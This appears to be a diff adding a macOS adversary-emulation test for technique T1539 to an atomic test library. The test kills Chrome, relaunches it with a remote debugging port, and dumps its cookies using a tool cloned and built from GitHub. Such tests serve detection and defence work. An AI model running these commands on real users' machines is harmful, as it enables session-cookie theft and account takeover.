Add T1539 macOS Chrome Remote Debugging

atomics/T1539/T1539.yaml

@@ -77,3 +77,38 @@ atomic_tests:
       remove-item #{output_file}
     name: powershell
     elevation_required: false
+- name: Steal Chrome Cookies via Remote Debugging (Mac)
+  auto_generated_guid: 
+  description: |-
+    The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
+
+    If successful, this test will output a list of cookies.
+
+    Note: Chrome processes will be killed during this test.
+
+    See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
+  supported_platforms:
+  - macos 
+  dependency_executor_name: bash
+  dependencies:
+  - description: 'go and whitechocolatemacadamianut '
+    prereq_command: |-
+      go version
+      /tmp/WhiteChocolateMacademiaNut/chocolate -h
+    get_prereq_command: |-
+      brew install go --force
+      git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git
+      cd WhiteChocolateMacademiaNut
+      go mod init chocolate
+      go mod tidy
+      go build
+  executor:
+    command: |-
+      killall 'Google Chrome'
+      sleep 1
+      open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
+      sleep 1
+      /tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
+    cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
+    name: bash
+    elevation_required: false